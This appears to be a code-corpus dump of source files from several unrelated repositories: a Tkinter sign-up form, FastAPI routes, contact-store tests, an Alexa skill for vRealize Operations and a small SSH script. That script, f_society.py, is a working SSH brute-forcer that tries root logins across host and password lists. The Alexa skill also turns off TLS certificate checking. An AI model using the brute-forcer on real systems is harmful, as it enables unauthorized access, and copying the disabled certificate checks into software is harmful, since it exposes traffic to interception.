lf.grid(column=0, row=1, padx=20, pady=20)
label = ttk.Label(lf, text="Email").grid(
column=0, row=3, **options)
email_entry = ttk.Entry(lf, textvariable=email)
email_entry.grid(
column=1, row=3, **options)
label = ttk.Label(lf, text="Username").grid(
column=0, row=5, **options)
username_entry = ttk.Entry(lf, textvariable=username)
username_entry.grid(
column=1, row=5, **options)
label = ttk.Label(lf, text="Password").grid(
column=0, row=7, **options)
password_entry = ttk.Entry(lf, textvariable=password, show="*")
password_entry.grid(
column=1, row=7, **options)
label = ttk.Label(lf, text="Confirm Password").grid(
column=0, row=9, **options)
confirmpassword_entry = ttk.Entry(
lf, textvariable=confirmPassword, show="*")
confirmpassword_entry.grid(column=1, row=9, **options)
button = ttk.Button(lf,
text="Sign Up",
command=lambda: register(self,
username_entry.get(), password_entry.get(), confirmpassword_entry.get(), email_entry.get())
).grid(column=0, row=11, **options, columnspan=2)
button = ttk.Button(self.signup,
text="Cancel",
command=lambda: self.closeSignup()
).grid(column=0, row=3, **options, sticky="SE")
def closeSignup(self):
"""This function make sure that the window is closed and allow to create new instance of Sign up window
"""
self.check = False
self.signup.destroy()
``` |
{
"source": "johndatserakis/find-the-state-api",
"score": 2
} |
#### File: alembic/versions/a1c5591554f0_create_score_table.py
```python
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects.postgresql import UUID
# revision identifiers, used by Alembic.
revision = "<KEY>"
down_revision = "<KEY>"
branch_labels = None
depends_on = None
def upgrade():
op.create_table(
"scores",
sa.Column(
"id",
UUID(as_uuid=True),
primary_key=True,
server_default=sa.text("uuid_generate_v4()"),
),
sa.Column("score", sa.String, index=True, nullable=False),
sa.Column("updated_date", sa.DateTime),
sa.Column(
"created_date", sa.DateTime, server_default=sa.text("now()"), nullable=False
),
)
def downgrade():
op.drop_table("scores")
```
#### File: app/routes/state.py
```python
from asyncpg.exceptions import UniqueViolationError
from fastapi import APIRouter, HTTPException, Path
from schemas.state import State, StateCreate, StateUpdate, StateDelete
from typing import List
import crud.state as crud
import uuid
router = APIRouter()
@router.get("/{id}", response_model=State)
async def read(id: uuid.UUID):
"""
Get item by id.
"""
item = await crud.get(id)
if not item:
raise HTTPException(status_code=404, detail="Item not found")
return item
@router.get("/name/{name}", response_model=State)
async def read_by_name(name: str):
"""
Get item by name.
"""
item = await crud.get_by_name(name)
if not item:
raise HTTPException(status_code=404, detail="Item not found")
return item
@router.get("", response_model=List[State])
async def read_all():
"""
Get all items
"""
return await crud.get_all()
# Commenting out the rest of the methods as they're not needed at this moment. They've been tested and do work
# correctly - good to have for the future.
# @router.post("", response_model=State, status_code=201)
# async def create(payload: StateCreate):
# """
# Create item.
# """
# try:
# item_id = await crud.create(payload)
# new_row = await crud.get(item_id)
# except UniqueViolationError:
# raise HTTPException(status_code=409, detail="Item already exists")
# except Exception:
# raise HTTPException(status_code=500, detail="Error processing request")
# return new_row
# @router.put("/{id}", response_model=State)
# async def update(id: uuid.UUID, payload: StateUpdate):
# """
# Update item.
# """
# item = await crud.get(id)
# if not item:
# raise HTTPException(status_code=404, detail="Item not found")
# try:
# item_id = await crud.update(id, payload)
# updated_row = await crud.get(item_id)
# except Exception:
# raise HTTPException(status_code=500, detail="Error processing request")
# return updated_row
# @router.delete("/{id}", response_model=StateDelete)
# async def delete(id: uuid.UUID):
# """
# Delete item.
# """
# try:
# await crud.delete(id)
# except Exception:
# raise HTTPException(status_code=500, detail="Error processing request")
# return {"id": id}
``` |
{
"source": "johndavidge/contact_store",
"score": 3
} |
#### File: contact_store/tests/test_contacts.py
```python
import json
test_contact = {
'username': 'test_contact',
'emails': [{'address': '<EMAIL>'}],
'first_name': 'Test',
'surname': 'Contact',
}
test_contact_2 = {
'username': 'test_contact_2',
'emails': [{'address': '<EMAIL>'}],
'first_name': '<NAME>',
'surname': 'Contact 2',
}
def create_contact(client, contact=test_contact):
return client.post('/contacts',
data=json.dumps(contact),
content_type='application/json')
def test_create_contact(client):
assert create_contact(client).status_code == 200
def test_create_contact_missing_data(client):
test_contact_incomplete = {
'username': 'test_contact',
'surname': 'Contact',
}
assert create_contact(client,
contact=test_contact_incomplete).status_code == 400
def test_show_contact(client):
assert client.get(
'/contacts/%s' % test_contact['username']).status_code == 404
create_contact(client)
response = client.get('/contacts/%s' % test_contact['username'])
assert response.status_code == 200
assert response.json['username'] == test_contact['username']
assert response.json['emails'] == test_contact['emails']
assert response.json['first_name'] == test_contact['first_name']
assert response.json['surname'] == test_contact['surname']
response = client.get(
'/contacts/%s' % test_contact['emails'][0]['address'])
assert response.status_code == 200
assert response.json['username'] == test_contact['username']
assert response.json['emails'] == test_contact['emails']
assert response.json['first_name'] == test_contact['first_name']
assert response.json['surname'] == test_contact['surname']
def test_update_contact(client):
create_contact(client)
response = client.put('/contacts/%s' % test_contact['username'],
data=json.dumps(test_contact_2),
content_type='application/json')
assert response.status_code == 200
response = client.get('/contacts/%s' % test_contact['username'])
assert response.status_code == 404
response = client.get('/contacts/%s' % test_contact_2['username'])
assert response.status_code == 200
assert response.json['username'] == test_contact_2['username']
assert response.json['emails'] == test_contact_2['emails']
assert response.json['first_name'] == test_contact_2['first_name']
assert response.json['surname'] == test_contact_2['surname']
def test_delete_contact(client):
create_contact(client)
assert client.delete(
'/contacts/%s' % test_contact['username']).status_code == 200
assert client.get(
'/contacts/%s' % test_contact['username']).status_code == 404
def test_list_contacts(client, app):
response = client.get('/contacts')
assert response.status_code == 200
assert response.json == {'contacts': []}
create_contact(client)
response = client.get('/contacts')
assert response.status_code == 200
assert response.json == {'contacts': [test_contact]}
create_contact(client, contact=test_contact_2)
response = client.get('/contacts')
assert response.status_code == 200
assert response.json == {'contacts': [test_contact, test_contact_2]}
``` |
{
"source": "johnddias/security-demo",
"score": 3
} |
#### File: johnddias/security-demo/f_society.py
```python
import paramiko
import socket
def runSshCmd(hostname, username, password, cmd, timeout=None):
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(hostname, username=username, password=password,
allow_agent=False, look_for_keys=False, timeout=5)
stdin, stdout, stderr = client.exec_command(cmd)
data = stdout.read()
print(data)
client.close()
fo = open("server.lst", "r")
hosts = fo.readlines()
fo.close()
fo = open("passwords.lst", "r")
passwords = fo.readlines()
fo.close()
for h in hosts:
for p in passwords:
try:
runSshCmd(h.rstrip(), "root", p.rstrip(), "uname -a")
except paramiko.AuthenticationException, e:
print("Host %s result: %s" % (h.rstrip(), e))
except paramiko.SSHException, e:
print("Host %s result: %s" % (h.rstrip(), e))
except socket.error, e:
print("Host %s result: %s" % (h.rstrip(), e))
else:
print("Host %s connected with password %s" % (h.rstrip(), p.rstrip()))
``` |
{
"source": "johnddias/vrobbie",
"score": 2
} |
#### File: johnddias/vrobbie/vrobbie.py
```python
import json
import logging
import requests
import collections
import time
import re
import sys
import os
from threading import Thread
from operator import itemgetter
from itertools import groupby
from flask import Flask, render_template
from flask_ask import Ask, statement, question, session, request, context, version
# Vars and Configurations
bearertoken = ""
# Edit with IP or FQDN of vrops and LI node
vropsHost = ""
liHost = ""
# Authentication is intially via credentials set. Subsequent calls use a
# bearer token.
vropsuser = ""
vropspassword = ""
vropsauthsource = "local"
liprovider = "ActiveDirectory"
liusername = ""
lipassword = ""
# For some labs, using self-signed will result in error during request due to cert check
# flip this flag to False to bypass certificate checking in those cases. I have suppressed the warning
# normally thrown by urllib3 but this is NOT RECOMMENDED!
verify = False
if not verify:
requests.packages.urllib3.disable_warnings()
app = Flask(__name__)
ask = Ask(app,"/")
logging.getLogger("flask_ask").setLevel(logging.DEBUG)
##############################################
# HELPERS
# - Fetchers
# - Handling voice service errors
# - Parsing and preparing response_msg
##############################################
def datacenter_report():
while True:
dc_report_dict = dict()
token = json.loads(liGetToken(liusername, lipassword, liprovider))
dc_report_dict["vMotions"] = json.loads(loginsightQuery("timestamp/LAST 86400000", "bin-width=all&aggregation-function=UCOUNT&aggregation-field=com.vmware.vsphere:vmw_hostd_vmotion_id", token["sessionId"]))
dc_report_dict["DRS vMotions"] = json.loads(loginsightQuery("timestamp/LAST 86400000/text/CONTAINS DrmExecuteVMotionLRO", "bin-width=all&aggregation-function=COUNT", token["sessionId"]))
dc_report_dict["VMs Created"] = json.loads(loginsightQuery("timestamp/LAST 86400000/vc_event_type/CONTAINS com.vmware.vim25.VmCreatedEvent/vc_event_type/CONTAINS com.vmware.vim25.vmclonedevent", "bin-width=all&aggregation-function=COUNT", token["sessionId"]))
dc_report_dict["VMs Deleted"] = json.loads(loginsightQuery("timestamp/LAST 86400000/vc_event_type/CONTAINS com.vmware.vim25.VmRemovedEvent", "bin-width=all&aggregation-function=COUNT", token["sessionId"]))
dc_report_dict["RConsole Sessions"] = json.loads(loginsightQuery("timestamp/LAST 86400000/text/CONTAINS Local connection for mks established", "bin-width=all&aggregation-function=COUNT", token["sessionId"]))
with open("prefetch/dcreport", 'w') as outfile:
json.dump(dc_report_dict, outfile)
print "dcreport updated at " + time.strftime("%Y-%m-%d %H:%M:%S")
time.sleep(300)
def more_info():
#Called when user wants more information on the impacted resource from the Alerts tree
if session.attributes["CurrentTree"] == "Alerts":
resource = vropsRequest("api/resources/"+session.attributes["CurrentObject"],"GET")
alertsQueryPayload = {
'resource-query': {
'resourceId': [session.attributes["CurrentObject"]]
},
'activeOnly': True
}
resourceAlerts = vropsRequest("api/alerts/query","POST",payload=alertsQueryPayload)
resourceName = resource["resourceKey"]["name"]
resourceHealth = resource["resourceHealth"]
resourceAlertCount = resourceAlerts["pageInfo"]["totalCount"]
outputSpeech = "The resource; {0}; is; {1}; for health status. There are {2} alerts associated with this resource. Shall I read those alerts?".format(resourceName, resourceHealth, resourceAlertCount)
with open("sessionData/"+session.sessionId+"resAlerts", 'w') as outfile:
json.dump(resourceAlerts, outfile)
session.attributes["ResAlertsIndex"] = 0
session.attributes["CurrentTree"] = "Resource"
return outputSpeech
#Called when user wants more information on an alert from the Resource tree
if session.attributes["CurrentTree"] == "Resource":
alert = vropsRequest("api/alerts/"+session.attributes["CurrentAlert"],"GET")
alertDef = vropsRequest("api/alertdefinitions/"+alert["alertDefinitionId"],"GET")
alertDesc = alertDef["description"]
recommendations=alertDef["states"][0]["recommendationPriorityMap"]
if (len(recommendations) == 1):
recQualifier = "only"
else:
recQualifier = "first"
recDesc = vropsRequest("api/recommendations/"+recommendations.keys()[0],"GET")
outputSpeech = "{0}. The {1} recommendation is as follows; {2}".format(alertDesc, recQualifier, recDesc["description"])
return outputSpeech
#Called when user wants more information on groups of alerts for a definition
if session.attributes["CurrentTree"] == "GroupedAlerts":
payload = json.loads('{"resourceId":'+ json.dumps(session.attributes["impactedResources"]) +'}')
resources = vropsRequest("api/resources/query","POST",payload=payload)
resourceList = resources["resourceList"]
resourceDict = {}
for res in resourceList:
resourceDict[res["resourceKey"]["name"]] = res["identifier"]
session.attributes["resourceDict"] = resourceDict
outputSpeech = ""
return outputSpeech
def continues():
if session.attributes["CurrentTree"] == "Alerts":
with open("sessionData/"+session.sessionId+"badgeAlerts", 'r') as alertsFile:
alerts = ""
alerts = json.load(alertsFile)
criticalAlerts = alerts_by_sev(alerts,"CRITICAL")
alert = criticalAlerts[session.attributes["AlertsIndex"]]
alertDefinition = alert["alertDefinitionName"]
resource = vropsRequest(alert["links"][1]["href"][10:] ,"GET")
resourceName = resource["resourceKey"]["name"]
if (len(criticalAlerts)-1 == session.attributes["AlertsIndex"]):
outputSpeech = "The resource; {0}; has a critical alert, {1}. There are no more cirtical alerts. Would you like more information on this resource?".format(resourceName, alertDefinition)
else:
outputSpeech = "The resource; {0}; has a critical alert, {1}. Next alert or more information on this resource?".format(resourceName, alertDefinition)
session.attributes["AlertsIndex"] += 1
session.attributes["CurrentObject"] = resource["identifier"]
return outputSpeech
if session.attributes["CurrentTree"] == "GroupedAlerts":
with open("sessionData/"+session.sessionId+"groupAlerts", 'r') as alertsFile:
alerts = ""
alerts = json.load(alertsFile)
definition = alerts[session.attributes["AlertsIndex"]]
alertDefinition = definition[0]["alertDefinitionName"]
impactedResources = []
for res in definition:
impactedResources.append(res["resourceId"])
session.attributes["impactedResources"] = impactedResources
session.attributes["alertDefinition"] = alertDefinition
numOfResources = len(definition)
if numOfResources == 1:
resourceText = "resource is"
else:
resourceText = "resources are"
if (len(alerts)-1 == session.attributes["AlertsIndex"]):
outputSpeech = "For the alert: {0}, {1} {2} impacted. There are no more alerts. More information on this alert?".format(alertDefinition, numOfResources, resourceText)
else:
outputSpeech = "For the alert: {0}, {1} {2} impacted. Next or more info?".format(alertDefinition, numOfResources, resourceText)
session.attributes["AlertsIndex"] += 1
return outputSpeech
if session.attributes["CurrentTree"] == "Resource":
with open("sessionData/"+session.sessionId+"resAlerts", 'r') as alertsFile:
alerts = ""
alerts = json.load(alertsFile)
criticalAlerts = alerts_by_sev(alerts,"CRITICAL")
alert = criticalAlerts[session.attributes["ResAlertsIndex"]]
alertDefinition = alert["alertDefinitionName"]
resource = vropsRequest(alert["links"][1]["href"][10:] ,"GET")
resourceName = resource["resourceKey"]["name"]
if (len(criticalAlerts)-1 == session.attributes["ResAlertsIndex"]):
outputSpeech = "The resource; {0}; has a critical alert, {1}. There are no more alerts. Would you like more information on this alert?".format(resourceName, alertDefinition)
elif len(criticalAlerts) == 0:
outputSpeech = "Reading active alerts from newest to oldest. The resource; {0}; has a critical alert, {1}. Next alert or more information on this alert?".format(resourceName, alertDefinition)
session.attributes["ResAlertsIndex"] += 1
else:
outputSpeech = "The resource; {0}; has a critical alert, {1}. Next alert or more information on this alert?".format(resourceName, alertDefinition)
session.attributes["ResAlertsIndex"] += 1
session.attributes["CurrentAlert"] = alert["alertId"]
return outputSpeech
def on_element_select(token):
if session.attributes["CurrentTree"] == "GroupedAlerts":
resource = vropsRequest("api/resources/"+token,"GET")
resourceProps = vropsRequest("api/resources/"+token+"/properties","GET")
resourceLatest = vropsRequest("api/resources/"+token+"/stats/latest","GET")
if resource["resourceKey"]["resourceKindKey"] == "VirtualMachine":
#Build complete response Here
vmname = resource["resourceKey"]["name"]
guestOS = [d["value"] for d in resourceProps["property"] if d["name"]=="config|guestFullName"][0]
numCpu = [d["value"] for d in resourceProps["property"] if d["name"]=="config|hardware|numCpu"][0]
memKB = [d["value"] for d in resourceProps["property"] if d["name"]=="config|hardware|memoryKB"][0]
toolsStatus = [d["value"] for d in resourceProps["property"] if d["name"]=="summary|guest|toolsRunningStatus"][0]
toolsVersion = [d["value"] for d in resourceProps["property"] if d["name"]=="summary|guest|toolsVersion"][0]
#guestDiskPercent = [d["statKey"]["data"] for d in resourceLatest["values"]["stat-list"]["stat"] if d["statKey"]["key"]=="guestfilesystem|percentage_total"]
text = {
"secondaryText": {
"type": "RichText",
"text": "<br/><b>Number of vCPU: </b>" + numCpu + "<br/>" + \
"<b>Memory Allocation (KB): </b>" + memKB + "<br/>" + \
"<b>Guest OS Name: </b>" + guestOS + "<br/>" + \
"<b>Tools Status: </b>" + toolsStatus + "<br/>" + \
"<b>Tools Version: </b>" + toolsVersion + "<br/>"
#"<b>Guest Filesystem Used: </b>" + guestDiskPercent + "%%<br/>"
},
"primaryText": {
"type": "RichText",
"text": "<font size='3'>"+resource["resourceKey"]["name"]+"</font>"
}
}
fullResponse = question("Here are the " + resource["resourceKey"]["resourceKindKey"] + " details"). \
display_render(title=resource["resourceKey"]["resourceKindKey"] + "details",template="BodyTemplate1",text=text,background_image_url=render_template('backgroundImageURL'),backButton='VISIBILE')
return fullResponse
def backout():
if session.attributes["CurrentTree"] == "Resource":
session.attributes["CurrentTree"] = "Alerts"
outputSpeech = "Returning to Critical Alerts list."
elif session.attributes["CurrentTree"] == "GroupedAlerts":
session.attributes["CurrentTree"] = ""
outputSpeech = "I am waiting for your query"
elif session.attributes["CurrentTree"] == "Alerts":
sessionCleanup()
session.attributes["CurrentTree"] = ""
outputSpeech = "I am waiting for your query"
else:
sessionCleanup()
outputSpeech = "I am waiting for your query"
return outputSpeech
def interactive_resp(data):
if session.attributes["CurrentTree"] == "GroupedAlerts":
listItems = []
resDict = session.attributes["resourceDict"]
for res in resDict:
listItem = {
"token":resDict[res],
"textContent": {
"primaryText": {
"text":res,
"type":"PlainText"
}
}
}
listItems.append(listItem)
enhancedResponse = question("Here are the impacted objects.").list_display_render(template="ListTemplate1", title="Impacted Objects", backButton="VISIBILE", token=None, \
background_image_url=render_template('backgroundImageURL'), listItems=listItems)
return enhancedResponse
def liGetToken(user=liusername, passwd=lipassword, authSource=liprovider):
url = "https://" + liHost + "/api/v1/sessions"
payload = "{\n \"provider\":\"" + liprovider + "\",\n \"username\":\"" + liusername + "\",\n \"password\":\"" + lipassword + "\"\n}"
headers = {
'accept': "application/json",
'content-type': "application/json"
}
response = requests.request("POST", url, data=payload, headers=headers, verify=verify)
return response.text
def vropsGetToken(user=vropsuser, passwd=vrop<PASSWORD>, authSource=vropsauthsource, host=vropsHost):
if not bearertoken:
url = "https://" + host + "/suite-api/api/auth/token/acquire"
payload = "{\r\n \"username\" : \"" + vropsuser + "\",\r\n \"authSource\" : \"" + vropsauthsource + "\",\r\n \"password\" : \"" + <PASSWORD> + "\",\r\n \"others\" : [ ],\r\n \"otherAttributes\" : {\r\n }\r\n}"
headers = {
'accept': "application/json",
'content-type': "application/json",
}
response = requests.request("POST", url, data=payload, headers=headers, verify=verify)
return response.text
elif int(bearertoken["validity"])/1000 < time.time():
url = "https://" + host + "/suite-api/api/versions"
headers = {
'authorization': "vRealizeOpsToken " + bearertoken["token"],
'accept': "application/json"
}
response = requests.request("GET", url, headers=headers, verify=verify)
if response.status_code == 401:
url = "https://" + host + "/suite-api/api/auth/token/acquire"
payload = "{\r\n \"username\" : \"" + vropsuser + "\",\r\n \"authSource\" : \"" + vropsauthsource + "\",\r\n \"password\" : \"" + <PASSWORD> + "\",\r\n \"others\" : [ ],\r\n \"otherAttributes\" : {\r\n }\r\n}"
headers = {
'accept': "application/json",
'content-type': "application/json",
}
response = requests.request("POST", url, data=payload, headers=headers, verify=verify)
return response.text
else:
return json.dumps(bearertoken)
else:
return json.dumps(bearertoken)
def loginsightQuery(constraints,params,token):
url = "https://" + liHost + "/api/v1/aggregated-events/" + constraints + "?" + params
headers = {
'authorization': 'Bearer ' + token
}
response = requests.request('GET', url, headers=headers, verify=verify)
return response.text
def vropsRequest(request,method,querystring="",payload=""):
global bearertoken
bearertoken = json.loads(vropsGetToken())
url = "https://" + vropsHost + "/suite-api/" + request
querystring = querystring
headers = {
'authorization': "vRealizeOpsToken " + bearertoken["token"],
'accept': "application/json",
'content-type': "application/json"
}
if (querystring != "") and (payload != ""):
response = requests.request(method, url, headers=headers, params=querystring, json=payload, verify=verify)
elif (querystring != ""):
response = requests.request(method, url, headers=headers, params=querystring, verify=verify)
elif (payload != ""):
response = requests.request(method, url, headers=headers, json=payload, verify=verify)
else:
response = requests.request(method, url, headers=headers, verify=verify)
print ("Request " + response.url + " returned status " + str(response.status_code))
print payload
return response.json()
def translate_resource_intent(resource):
resString = ""
vropsResKindString = {
'bms':'virtualmachine',
'bm':'virtualmachine',
'vms':'virtualmachine',
'vm':'virtualmachine',
'hosts': 'hostsystem',
'host': 'hostsystem',
'clusters': 'clustercomputeresource',
'cluster': 'clustercomputeresource',
'datastores': 'datastore',
'datastore': 'datastore'
}
# if intent['slots']['resource']['value'] in vropsResKindString:
resString = vropsResKindString.get(resource.lower())
return resString
def speechify_resource_intent(resource,plurality):
vocalString = ""
vocalStrings = {
'bm':'virtual machine',
'vm':'virtual machine',
'host': 'host system',
'cluster': 'cluster',
'datastore': 'data store',
'bms':'virtual machine',
'vms':'virtual machine',
'hosts': 'host system',
'clusters': 'cluster',
'datastores': 'data store'
}
if plurality:
vocalString = vocalStrings.get(resource.lower()) + "s"
else:
vocalString = vocalStrings.get(resource.lower())
return vocalString
def alerts_by_sev(alerts,sev):
filteredAlerts = []
if any(x == sev for x in ["INFO","WARNING","IMMEDIATE","CRITICAL"]):
for alert in alerts["alerts"]:
if alert["alertLevel"] == sev:
filteredAlerts.append(alert)
return filteredAlerts
def group_alerts_by_def(alerts,groupkey):
sortedAlerts = sorted(alerts, key=itemgetter(groupkey))
groupedAlerts = []
for key, items in groupby(sortedAlerts, itemgetter(groupkey)):
groupedAlerts.append(list(items))
return groupedAlerts
def sessionCleanup():
dir = "sessionData"
files = os.listdir(dir)
for file in files:
if file.startswith(session.sessionId):
os.remove(os.path.join(dir,file))
#####################################################
# Invocations
#####################################################
@ask.launch
def welcome_msg():
welcome_msg = render_template('welcome')
textContent = {
'primaryText': {
'text':'<font size="3">Intelligent Operations</font>',
'type':'RichText'
}
}
if (context.System.device.supportedInterfaces.Display):
return question(welcome_msg).display_render(
title='Welcome to vRealize Operations',template="BodyTemplate2",text=textContent,background_image_url=render_template('backgroundImageURL'),image=render_template('vrops340x340ImageURL'), \
hintText="Get Critical VM alerts")
else:
return question(welcome_msg)
@ask.intent('AMAZON.YesIntent')
def yesIntent():
outputSpeech = continues()
textContent = {
'primaryText': {
'text':"<font size='3'>"+outputSpeech+"</font>",
'type':'RichText'
}
}
title = 'Welcome to vRealize Operations'
image = ""
if (session.attributes["CurrentTree"] == "GroupedAlerts"):
title = "Alerts by Definition"
image = render_template('alert' + session.attributes['groupCriticality'] + 'ImageURL')
if (context.System.device.supportedInterfaces.Display):
return question(outputSpeech).display_render(
title=title,template="BodyTemplate1",text=textContent,background_image_url=render_template('backgroundImageURL'),image=image)
else:
return question(outputSpeech)
@ask.intent('AMAZON.NextIntent')
def nextIntent():
outputSpeech = continues()
textContent = {
'primaryText': {
'text':"<font size='3'>"+outputSpeech+"</font>",
'type':'RichText'
}
}
title = 'Welcome to vRealize Operations'
image = ""
if (session.attributes["CurrentTree"] == "GroupedAlerts"):
title = "Alerts by Definition"
image = render_template('alert' + session.attributes['groupCriticality'] + 'ImageURL')
if (context.System.device.supportedInterfaces.Display):
return question(outputSpeech).display_render(
title=title,template="BodyTemplate2",text=textContent,background_image_url=render_template('backgroundImageURL'),image=image)
else:
return question(outputSpeech)
@ask.intent('MoreInformationIntent')
def MoreInformationIntent():
outputSpeech = more_info()
textContent = {
'primaryText': {
'text':outputSpeech,
'type':'PlainText'
}
}
if ((session.attributes["CurrentTree"] == "GroupedAlerts") and (context.System.device.supportedInterfaces.Display)):
enhancedResponse = interactive_resp(outputSpeech)
return enhancedResponse
elif (context.System.device.supportedInterfaces.Display):
return question(outputSpeech).display_render(
title='Welcome to vRealize Operations',template="BodyTemplate2",text=textContent,background_image_url=render_template('backgroundImageURL'))
else:
if (session.attributes["CurrentTree"]):
return question(outputSpeech)
else:
return question("I'm sorry, I don't understand your request")
@ask.intent('AMAZON.NoIntent')
def noIntent():
outputSpeech = backout()
textContent = {
'primaryText': {
'text':'Intelligent Operations',
'type':'PlainText'
}
}
if (context.System.device.supportedInterfaces.Display):
return question(outputSpeech).display_render(
title='Welcome to vRealize Operations',template="BodyTemplate2",text=textContent,background_image_url=render_template('backgroundImageURL'))
else:
return question(outputSpeech)
@ask.intent('Amazon.CancelIntent')
def cancelIntent():
outputSpeech = backout()
return question(outputSpeech)
@ask.intent('vSANStatusIntent')
def vsanstatus():
#build query Parameters
vsanworld_res = vropsRequest("api/resources","GET",querystring="resourceKind=vSAN World")
vsan_res_id = vsanworld_res["resourceList"][0]["identifier"]
begin = int(round(time.time()*1000-21600000))
end = int(round(time.time()*1000))
querystring = {"begin":begin,"end":end,"rollUpType":"AVG","intervalQuantifier":"7", \
"intervalType":"HOURS",\
"statKey": [ "summary|total_latency", \
"summary|total_iops", \
"summary|total_number_vms", \
"summary|total_cluster_count", \
"summary|vsan_diskspace_capacity", \
"summary|vsan_diskspace_capacity_used", \
"summary|remaining_capacity" ], \
"resourceId":vsan_res_id, }
#execute query and process
response = vropsRequest("api/resources/stats","GET",querystring)
#building response
stats_dict = dict()
for statitem in response["values"][0]["stat-list"]["stat"]:
stat_key = statitem["statKey"]["key"].split("|")[1].replace("_"," ").title()
if (stat_key.find("Cluster Count") != -1):
stat_key = "Number of Clusters"
if (stat_key.find("Capacity") != -1):
stat_key = stat_key + " in TB"
if (stat_key.find("Vsan") != -1):
stat_key = stat_key.replace("Vsan","")
if (stat_key.find("Total") != -1):
stat_key = stat_key.replace("Total","Average")
if (stat_key.find("Iops") != -1):
stat_key = stat_key.replace("Iops","IOPS")
if (stat_key.find("Vms") != -1):
stat_key = stat_key.replace("Vms","of VMs")
stat_key = stat_key.replace("Average","")
stats_dict[stat_key] = str(int(statitem["data"][0]))
#TODO add ordering to display so items appear in some logical ordering
secondaryText = "<br/>"
for key, value in sorted(stats_dict.iteritems(), key=lambda (k,v): (v,k)):
secondaryText = secondaryText + "<b> %s:</b> %s <br/>" %(key,value)
secondaryText = secondaryText + "<br/>"
text = {
"tertiaryText": {
"type":"RichText",
"text":"6 hour average statistics shown."
},
"secondaryText": {
"type": "RichText",
"text": secondaryText
},
"primaryText": {
"type": "RichText",
"text": "<b><font size='7'>vSAN Status</font></b>"
}
}
enhancedResponse = question("v SAN Status Report.").display_render(template="BodyTemplate2", title="Datacenter Operations", text=text,backButton="VISIBILE", token=None, \
background_image_url=render_template('backgroundImageURL'),image=render_template('vsan340x340ImageURL'))
return enhancedResponse
@ask.intent('DataCenterCapacityIntent')
def dccapacity():
return question("Data Center Capacity Report")
@ask.intent('DataCenterActivityIntent')
#Runs several Log Insight and vROps queries to build a report for echo show
#TODO Make sure to add device checking and optimize for echo voice only
def dcactivity():
secondaryText = "<br/>"
with open("prefetch/dcreport", 'r') as dcreport:
report_data = json.load(dcreport)
for metric, value in report_data.iteritems():
item = "<b>Number of " + metric + ": </b>"
if not (value["bins"]):
item = item + "None"
else:
item = item + str(value["bins"][0]["value"])
secondaryText = secondaryText + item + "<br/>"
text = {
"secondaryText": {
"type": "RichText",
"text": secondaryText
},
"primaryText": {
"type": "RichText",
"text": "<font size='5'>Datacenter Activity Past 24 Hours</font>"
}
}
enhancedResponse = question("Datacenter Activity in the Past 24 Hours.").display_render(template="BodyTemplate2", title="Datacenter Operations", text=text,backButton="VISIBILE", token=None, \
background_image_url=render_template('backgroundImageURL'), image=render_template('vsphere340x340ImageURL'))
return enhancedResponse
@ask.intent('GroupAlertsIntent')
#Starts a tree to read active alerts grouped by alert definition for the stated resource kind
#and criticality. Alert definitions are read by group with option list individual alerts in a group
def group_criticality_alerts(criticality, resource):
request = "api/alerts/query"
method = "POST"
payload = {
'resource-query': {
'resourceKind': [translate_resource_intent(resource)]
},
'activeOnly': True,
'alertCriticality': [criticality.upper()]
}
session.attributes["groupCriticality"] = criticality
alerts = vropsRequest(request,method,payload=payload)
numAllAlerts = str(alerts["pageInfo"]["totalCount"])
speech_output = "There are " + numAllAlerts + " " + criticality + " alerts for monitored " + speechify_resource_intent(resource,1) + ". " + \
"Shall I read the alerts by alert definition?"
textContent = {
'primaryText': {
'text': "<font size='7'>" + speech_output + "</font>",
'type':'RichText'
}
}
groupedAlerts = []
groupedAlerts = group_alerts_by_def(alerts['alerts'],'alertDefinitionId')
with open("sessionData/"+session.sessionId+"groupAlerts", 'w') as outfile:
json.dump(groupedAlerts, outfile)
session.attributes["AlertsIndex"] = 0
session.attributes["CurrentTree"] = "GroupedAlerts"
title = "Total " + criticality + " alerts for " + speechify_resource_intent(resource,1) + "."
return question(speech_output).display_render(
title=title,template="BodyTemplate1",text=textContent,background_image_url=render_template('backgroundImageURL',image="alertcriticalImageURL"))
@ask.intent('ListBadgeAlertsIntent')
#Starts a tree to read active alerts for the stated resource kind for a major badge.
#Alerts are read individually with option for more info depth for a resource
def list_badge_alerts(badge, resource):
request = "api/alerts/query"
method = "POST"
payload = {
'resource-query': {
'resourceKind': [translate_resource_intent(resource)]
},
'activeOnly': True,
'alertCriticality': ["CRITICAL","IMMEDIATE","WARNING","INFORMATION"],
'alertImpact': [badge]
}
alerts = vropsRequest(request,method,payload=payload)
numAllAlerts = str(alerts["pageInfo"]["totalCount"])
numImmediateAlerts = str(len(alerts_by_sev(alerts,"IMMEDIATE")))
numCriticalAlerts = str(len(alerts_by_sev(alerts,"CRITICAL")))
speech_output = "There are " + numAllAlerts + " " + badge + " alerts for monitored " + speechify_resource_intent(resource,1) + ". " + \
"Of those " + numCriticalAlerts + " are critical and " + numImmediateAlerts + " are immediate. Shall I read the critical alerts?"
textContent = {
'primaryText': {
'text': "<font size='3'>" + speech_output + "</font>",
'type':'RichText'
}
}
with open("sessionData/"+session.sessionId+"badgeAlerts", 'w') as outfile:
json.dump(alerts, outfile)
session.attributes["AlertsIndex"] = 0
session.attributes["CurrentTree"] = "Alerts"
if (context.System.device.supportedInterfaces.Display):
return question(speech_output).display_render(
title='Welcome to vRealize Operations',text=textContent,background_image_url=render_template('backgroundImageURL'))
else:
return question(speech_output)
@ask.display_element_selected
def element():
fullResponse = on_element_select(request["token"])
return fullResponse
@ask.intent('getAlertsIntent')
@ask.intent('getOverallStatus')
@ask.intent('goodbyeIntent')
def goodbye_msg():
goodbye_msg = render_template('goodbye')
logging.debug("Session Ended")
sessionCleanup()
return statement(goodbye_msg)
@ask.session_ended
def session_ended():
logging.debug("Session Ended")
sessionCleanup()
return "", 200
if __name__ == '__main__':
bearertoken = json.loads(vropsGetToken())
background_thread = Thread(target=datacenter_report)
background_thread.daemon = True
background_thread.start()
app.run(debug=True)
``` |
{
"source": "johnddias/vrops-api-proxy",
"score": 3
} |
#### File: johnddias/vrops-api-proxy/vropsrelay.py
```python
from flask import Flask, Markup, request, json, Response, jsonify
import requests
import logging
import re
import sys
import time
token = ""
#CONFIGURE CREDENTIALS AND FQDN/IP for vR Ops API
user = "admin"
passwd = "password"
host = "x.x.x.x"
# Define if you want to leverage SSL
SSLCERT = ''
SSLKEY = ''
